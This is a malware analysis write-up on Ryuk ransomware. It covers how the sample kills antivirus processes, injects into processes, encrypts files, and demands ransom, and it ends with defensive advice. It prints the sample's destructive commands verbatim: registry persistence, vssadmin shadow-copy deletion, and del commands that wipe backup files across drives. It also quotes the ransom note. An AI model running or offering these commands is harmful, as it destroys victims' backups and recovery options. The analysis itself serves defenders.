Ryuk Ransomware PDF

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Ryuk is a fictional character in one of a Japanese series that I never followed. I don't know
much about the character but Ryuk ransomware variant is pretty interesting Its not as
straight forward as other variants. The first stage executable I found, was compiled on Aug
14th (8/14/2018)


- User initiates the payload

- Payload drops encryption keys and a bat file
- Payload executes the following commands
• Taskkill: To kill specific apps and anti virus software
• REG: Used for persistence
- Payload starts encrypting the files, folders and shares recursively, without modifying the
file name or extension.
- Key(s) destruction
- Payload executes the dropped bat file and initiates the following commands
• DEL: Used to delete files and folders
• VSSADMIN: Used to delete shadow copies.


If you follow the life cycle of this payload, it executes multiple commands, mainly NET.exe,
NET1.exe, DEL.exe, REG.exe, TASKKILL.exe.

For fancy stats go to http://udurrani.com/exp0/ryuk_command_stats.html

All the commands are executed by using ShellExecuteW() function

In this case param is using CMD.exe to execute other commands with rbp as command line
argument(s). Don’t worry about sign_extend(), thats just to change a shorter value to longer
one. Internally, in most cases ShellExecute() function calls CreateProcess().

Let’s look at all the TASKKILL commands. I am sure you can figure out what those
commands are doing.

Here is the list of NET commands

Payload runs the following command for persistence:

REG ADD "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v

"svchos" /t REG_SZ /d "C:\Users\foo\Desktop\PAYLOAD.exe" /f

Registry entry is called svchos.

List of VSSADMIN commands

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

List of DEL commands

del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0

Vssadmin and del commands are part of a dropped file called windows.bat

I remember another ransomware, actually a wiper, I named server destroyer. It also had
similar set of features. Please NOTE: This particular payload is not a wiper. You can take a
look at server destroyer wiper by clicking on the following links:



Another similar example: Olympic destroyer wiper


The payload uses the following functions to iterate through the processStack
CreateToolhelp32Snapshot() // If return != INVALID_HANDLE_VALUE
-> Process32First
-> Process32Next

Description of processes is retreived by PROCESSENTRY32 DataStructure

Payload uses above methodology to go through processes but skips the following processes
i.e. excluded from the injection

❖ csrss.exe
❖ explorer.exe
❖ lsaas.exe

Time for an injection:

I think it’s better to draw it out first.

The payload actually has a function that takes an integer value. This value is the PID that
attacker wants to inject into. Once the payload retrieves the right PID, its passed to the
function and the injection mechanism starts working.

Payload also uses the following function(s) to elevate the privileges.

Once the injection is complete, the fun begins????

YES! you got it: Your files are getting encrypted recursively by
the brand new thread created, right after the injection and you
can’t do squat about it.

The good news is: It doesn't touch some of the folders e.g.
Windows, Chrome, Mozilla but that doesn't really help!

Ransom Note


Your business is at serious risk.

There is a significant hole in the security system of your company.
We've easily penetrated your network.
You should thank the Lord for being hacked by serious people not some stupid schoolboys or
dangerous punks.
They can damage all your important data just for fun.

Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256.
No one can help you to restore files without our special decoder.

Photorec, RannohDecryptor etc. repair tools

are useless and can destroy your files irreversibly.

If you want to restore your files write to emails (contacts are at the bottom of the sheet)
and attach 2-3 encrypted files
(Less than 5 Mb each, non-archived and your files should not contain valuable information
(Databases, backups, large excel sheets, etc.)).
You will receive decrypted samples and our conditions how to get the decoder.
Please don't forget to write the name of your company in the subject of your e-mail.

You have to pay for decryption in Bitcoins.

The final price depends on how fast you write to us.
Every day of delay will cost you additional +0.5 BTC
Nothing personal just business

As soon as we get bitcoins you'll get all your decrypted data back.
Moreover you will get instructions how to close the hole in security
and how to avoid such problems in the future
+ we will recommend you special software that makes the most problems to hackers.

Attention! One more time !

Do not rename encrypted files.

Do not try to decrypt your data using third party software.

P.S. Remember, we are not scammers.

We don`t need your files and your information.
But after 2 weeks all your files and keys will be deleted automatically.
Just send a request immediately after infection.
All data will be restored absolutely.
Your warranty - decrypted samples.

contact emails
[email protected]
[email protected]

BTC wallet:


No system is safe

File Extension: Normally ransomware payload would change the file extensions but in this
case file names and extensions are not touched. However file content is encrypted. I like to
code, thats why I developed a similar ransomware that uses AES-RSA encryption and won’t
modify file extension(s). I tested it against 2 AV engines. NOTE: Its not about who is better. I
had 2 AV engines, so I used them for testing.



- No matter what people tell you, you MUST backup your corporate data
- Use 2 layers of end-point security
- Hire security folks that can automate
- Remember, if you pay the ransom, that doesn't guarantee you will get your data back.
BlackSheep ransomware had no decryption path.
- Last but not least, hire smart folks


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